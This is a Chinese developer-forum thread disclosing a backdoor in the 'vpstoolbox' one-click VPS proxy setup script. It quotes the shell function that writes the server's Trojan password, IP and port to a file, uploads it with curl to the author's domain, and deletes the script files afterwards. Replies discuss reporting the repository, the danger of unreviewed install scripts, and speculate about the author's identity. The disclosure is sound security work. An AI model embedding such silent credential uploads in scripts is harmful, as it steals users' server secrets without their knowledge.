仓库:https://github.com/johnrosen1/vpstoolbox/blob/master/vps.sh
会把机场的 IP ,端口,密码上传到作者可控的服务器,后续想干嘛就不知道了
https://github.com/johnrosen1/vpstoolbox/blob/ec7e0dc19561563f5d278a3e436f1cf67b9ae7b5/vps.sh#L494
clean_env(){
prasejson
cd /root
echo "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(grep MemTotal /proc/meminfo | awk '{print $2}' | xargs -I {} echo "scale=1; {}/1024^2" | bc)G ${route_final}${mycountry} ${myip_org} ${myip} ${myipv6} ${target_speed_up} Mbps)" &> ${myip}.txt
curl --retry 5 https://johnrosen1.com/fsahdfksh/ --upload-file ${myip}.txt &> /dev/null
rm ${myip}.txt
cd
rm -rf /root/*.sh
rm -rf /usr/share/nginx/*.sh
clear
}
1
buyan3303 2023-03-30 10:37:12 +08:00
[机场的 IP ,端口,密码上传到作者可控的服务器]
通常自己免费使用这些机场 |
2
proxytoworld OP @buyan3303 也有可能转卖,谁知道呢
|
3
Greenm 2023-03-30 11:02:38 +08:00 1
不管出于什么目的,我已经提交 report 给 github 了。
|
4
vsitebon 2023-03-30 11:19:02 +08:00
太特么溜了
|
5
Andim 2023-03-30 11:37:50 +08:00 via iPhone
还是 1000 以上的关注项目呀
|
6
arfaWong 2023-03-30 11:39:45 +08:00 2
|
7
jomalonejia 2023-03-30 11:47:13 +08:00
关注后续
|
8
csrocks 2023-03-30 11:48:38 +08:00
已经删库了😂
|
9
aogg 2023-03-30 11:49:06 +08:00
已经打不开 github 项目了
|
10
lzgshsj 2023-03-30 11:49:36 +08:00 4
不开 issue 的的仓库,多少有点这那毛病
|
11
Rache1 2023-03-30 11:53:42 +08:00
|
12
Rache1 2023-03-30 11:55:32 +08:00
在这个 issue 发出来的时候,还有 1.6k star 😄
为什么 trojan 订阅地址包括用户密码等要上传到个人博客? · Issue #138 · johnrosen1/vpstoolbox · GitHub https://web.archive.org/web/20221128070511/https://github.com/johnrosen1/vpstoolbox/issues/138 |
13
vsitebon 2023-03-30 11:56:00 +08:00
已经删号和删库了
|
14
iyiluo 2023-03-30 11:56:22 +08:00
跑路了,估计好一大波肉鸡
|
15
lakehylia 2023-03-30 11:56:48 +08:00
这是真正的删库跑路吧。。。
|
16
vsitebon 2023-03-30 11:59:13 +08:00 12
该开发者在 v 站: https://www.v2ex.com/member/johnrosen1
|
17
leaflxh 2023-03-30 12:00:49 +08:00
曾经有一次把 get.docker.com 记错了,打成了 get-docker.sh 。用一键脚本感觉像是在裸奔
|
18
leaflxh 2023-03-30 12:02:15 +08:00 2
#!/bin/bash
while [ 1 ] do echo " ______________ ______ ___ ________ " echo " .\\\\ _ _ /----/ /_____/ \\\\\\. /_ " echo " )__/ /___\\ _/ // / // /___(__ " echo " / // \\ // / // /_\\ \\ " echo " /_____\\ /_____\\ _________\\ _______ \\ " echo " ////////\\_____///////\\\\/////////\\\\///////\\_____//. " echo " _________ ___________ ________ _______ ________ " echo " _) /_.) ._ // ___ // /_____\\____ ( " echo " \\ |__/ \\__ |/ _// / / / X0 / \\ " echo " \\ : / / \\__ / //_ /\\ /. / \\ " echo " .\\\\___ /___\\ /_____////____/\\ \\\\__ / " echo " ////\\____//////\\____/////// ////////\\____////\\____//. " echo " ///// ///// ///// ///// " echo "" echo " WHY YOU NO LOOK AT THE SOURCE BEFORE YOU PIPE INTO BASH??" echo "" echo " #AirGap2020 Virtual Conference May 2nd! https://airgapp.in" echo " Follow @airgappin on Twitter for updates!" echo "" done |
19
cookcode 2023-03-30 12:19:59 +08:00 via Android
看了一眼,开发这个的老哥在 v2 也宣传过
|
21
iijboom 2023-03-30 12:20:23 +08:00
https://github.com/laoz77/trojan-gfw-script
这个应该是他的大号 打开可以看到他的网址,建议大家一起一锅端举报了 trojan-gfw-script This script will help you set up a trojan-gfw server in an extremely fast way. https://www.johnrosen1.com/trojan/ main course Auto install and setup Trojan-Gfw and nginx. Auto enable tcp-bbr and disable tcp slow start |
22
proxytoworld OP @vsitebon #16 牛逼,这样的开发能封了吗,这脚本还是 root 权限
|
23
proxytoworld OP |
24
proxytoworld OP 博客也暂时关了
|
25
Death 2023-03-30 12:26:39 +08:00 2
一键脚本应该尽量默认是有问题的
哪怕是官方提供的安装脚本也要自己过一遍才能放心 |
26
iijboom 2023-03-30 12:27:32 +08:00
https://github.com/johnwick3gits/trojan-gfw-script 小号加 1
This branch is 1211 commits ahead of laoz77:master. 下面也有他的信息 Telegram Channel And Group https://t.me/johnrosen1 https://t.me/trojanscript 中文文檔 |
27
FranzKafka95 2023-03-30 12:29:54 +08:00 via Android 1
不开 ISSUE 区其实已经很能说明问题了。
|
30
404www 2023-03-30 12:33:04 +08:00
哈哈,连博客也删解析了
|
31
proxytoworld OP @LeegoYih #28 有可能是抓下来在卖,如果自己用,这样大批量的也用不着
|
32
huoshanhui 2023-03-30 12:50:21 +08:00
把这祸害弄进去
|
33
mnsw 2023-03-30 12:50:36 +08:00
啊这,以前好像还有群的。
|
34
lambdaq 2023-03-30 13:38:55 +08:00 1
一来可以自己卖赚钱
二来可以怼人举报一波,把线索卖个晶哥简单立个功 |
35
XSNARUTO 2023-03-30 13:54:11 +08:00 3
从来不推荐任何小白用什么一件脚本,反正现在便宜机场一大堆,我甚至会觉得随便给小白丢什么「一键脚本」的人都不是什么太负责的人。真的有需求的人,要么会自己搭(毕竟也不难),要么多少懂一点起码的 review 脚本代码。
想起来之前逛 Twitter 看到有小白(而且说了自己不是数码 /科技爱好者)询问数据存储意见,很简单的就买现成云存储的需求,结果也是有人上来就让人家去买 NAS 。我真的无大语,总有人喜欢放个屁,然后跑得无影无踪……。 |
36
rock123 2023-03-30 14:23:48 +08:00
|
37
Greenm 2023-03-30 14:35:40 +08:00 1
https://t.me/vpstoolbox/2 他尝到了甜头,重新搞了个小号打复活赛了
|
38
Greenm 2023-03-30 14:52:36 +08:00
https://github.com/ghost 这个账号应该才是他的大号,隐藏了 activity
|
39
jenlors 2023-03-30 14:56:20 +08:00 1
这种人就是败类
|
40
proxytoworld OP @Greenm 咋查到大号的,牛啊
|
41
AkaGhost 2023-03-30 15:00:13 +08:00 via Android 1
ghost 是个特殊用户,代表那个用户已经注销了
|
43
joesonw 2023-03-30 16:02:36 +08:00 via iPhone
域名用了 privacy guardian ,一起去举报 abuse 披露注册信息,不知有没有用。
|
45
jockielee 2023-03-30 16:50:00 +08:00 2
《你用我脚本,我用你代理》🤣
|
46
Jeanslike 2023-03-30 16:59:56 +08:00
确实是个败类
|
48
BigShot404 2023-03-30 17:17:04 +08:00
说到这个,现在用 OPENAI ,扫一遍代码然后标注一些疑似账号泄露或者后门地址应该不难吧?
|
49
20160409 2023-03-30 17:18:49 +08:00
|
50
0x535 2023-03-30 17:40:32 +08:00 3
580 个 fork 都没发现这个问题 😂 fork 了个寂寞
|
51
DeltaC 2023-03-30 17:50:48 +08:00
致富门路+1
|
52
HaneRo 2023-03-30 18:06:37 +08:00 via Android
rm -rf /root/*.sh ?删除 root 下所有 sh 文件?这是不是不太好
|
53
FightPig 2023-03-30 19:32:57 +08:00
删的动作挺快
|
54
oszlso 2023-03-30 21:43:51 +08:00 1
作者 @johnrosen1 今日活跃度排名 9187 ,上线咋不吱声呀🤭
|
55
boris1993Jr 2023-03-31 00:35:09 +08:00 via iPhone
@0x535 #50 我感觉大部分人都是拿 fork 当收藏用的,因为小白喜欢这么玩,而用一键脚本的又有不少小白
|
56
FrankAdler 2023-03-31 00:42:33 +08:00 1
https://github.com/Doutianbao/vpstoolbox 相关的 fork 还能找到
|
57
n18255447846 2023-03-31 03:22:10 +08:00 2
事实证明就算有大量使用的人甚至官方的脚本 or 程序,还是有一定的风险。就看懂行的有没有人爆出来了
|
58
ttyhtg 2023-03-31 07:26:26 +08:00 1
能不能把他扒个底朝天,把他送进去?
|
59
levelworm 2023-03-31 08:20:44 +08:00
看了下文中的语气,感觉不太像是大陆人?但是的确又是简体字。
比如这个:操作系统不支援,请使用 Debian 或者 Ubuntu 运行。 像我这种 shell 小白真是大开眼界啊,能学不少东西,希望大家能抓到这个人。 |
60
CodeCodeStudy 2023-03-31 09:43:09 +08:00
@levelworm 应该是湾湾用简体字,然后搞肉鸡
|
62
proxytoworld OP @levelworm #59 合理了
|
64
woyao 2023-03-31 09:53:15 +08:00
有使用过这些 docker 的人也小心一点吧
https://hub.docker[.]com/r/johnrosen/nzbget/tags |
65
Vindroid 2023-03-31 10:04:11 +08:00 1
灯下黑,很多人一看是开源的,还那么多星星,那就不看源码,一把梭哈。一键脚本我是从来不敢直接用的
|
66
AlphaTauriHonda 2023-03-31 10:04:52 +08:00 via iPhone
实在是离谱。
是🧱难以封光代理所以主动发布间谍项目? 还是 johnrosen1 想倒卖代理获利? |
67
jklove123bai 2023-03-31 10:13:37 +08:00
所以那些相信开源没事的人的逻辑,我很难理解
|
69
woyao 2023-03-31 11:14:04 +08:00
@CodeCodeStudy 应该不是湾湾
他的域名 jiesen[.]life 和 johnrosen1[.]com ,看了一下解析 IP ,有不少上海电信的 IP 。应该是在上海。 |
70
ICU 2023-03-31 11:18:46 +08:00
哈哈 楼主这个发现,还上了这里的新闻( https://www.oschina.net/news/234764 )
|
71
woyao 2023-03-31 11:21:03 +08:00
不是湾湾的证据还可以看这篇文章
Ledger Nano X 开箱记录及上手体验 https://johnrosen1[.]com/2021/06/02/ledger/ |
72
leeuu 2023-03-31 12:56:26 +08:00 via iPhone
开盒了
|
73
Shura 2023-03-31 15:40:35 +08:00
真是败类,没有人品
|
74
levelworm 2023-03-31 16:33:19 +08:00 via Android
@lxiian 看 69 楼,也不好确定了。另外注释里其他的中文看起来又比较像大陆这边的,不知道坛贤们能不能挖出来更多的。
|
75
levelworm 2023-03-31 16:51:19 +08:00 via Android
|
76
lovedebug 2023-03-31 16:57:33 +08:00
繁体字“支援”默认不会翻译成“支持”
|
77
mypchas6fans 2023-03-31 17:12:08 +08:00
@20160409 之前说有挖矿传言,但我一直在用,只能说看上去没问题,vps cpu 内存流量都正常
|
78
Jakarta 2023-03-31 20:03:41 +08:00 via Android
我感觉像是居住在大陆的台湾人。
|
79
Jakarta 2023-03-31 20:17:08 +08:00 via Android
johnrosen.xyz 也是他的,还搭建了邮件服务器,邮箱是 john 艾特 johnrosen.xyz
|
80
kebamt 2023-03-31 23:19:07 +08:00 via iPhone
@mypchas6fans 没出现过问题,都正常,只是脚本会自动给你做决定服务器层面屏蔽掉一些网站,如:大纪元😂
|
81
mcone 2023-04-01 21:07:40 +08:00
前两天看到帖子,这两天无聊搜下了,跟楼上某位朋友的结论有点像,应该是个肉身在大陆的台湾人或者被港台语法深刻浸染过的大陆人。
|
82
love2wind 2023-04-02 18:23:38 +08:00
慎用一键脚本啊,谁知道有没有夹带私货
|
83
luoshengdu 2023-04-02 22:32:17 +08:00
我擦,我用了好多年了啊
|
84
mypchas6fans 2023-04-03 08:49:19 +08:00
@kebamt 嗯,这个看生成的 config.json 就知道,有必要。
|
85
zlhsvc 2023-04-03 10:44:58 +08:00
还真没有去翻一键脚本的习惯,下次看来得多注意了
|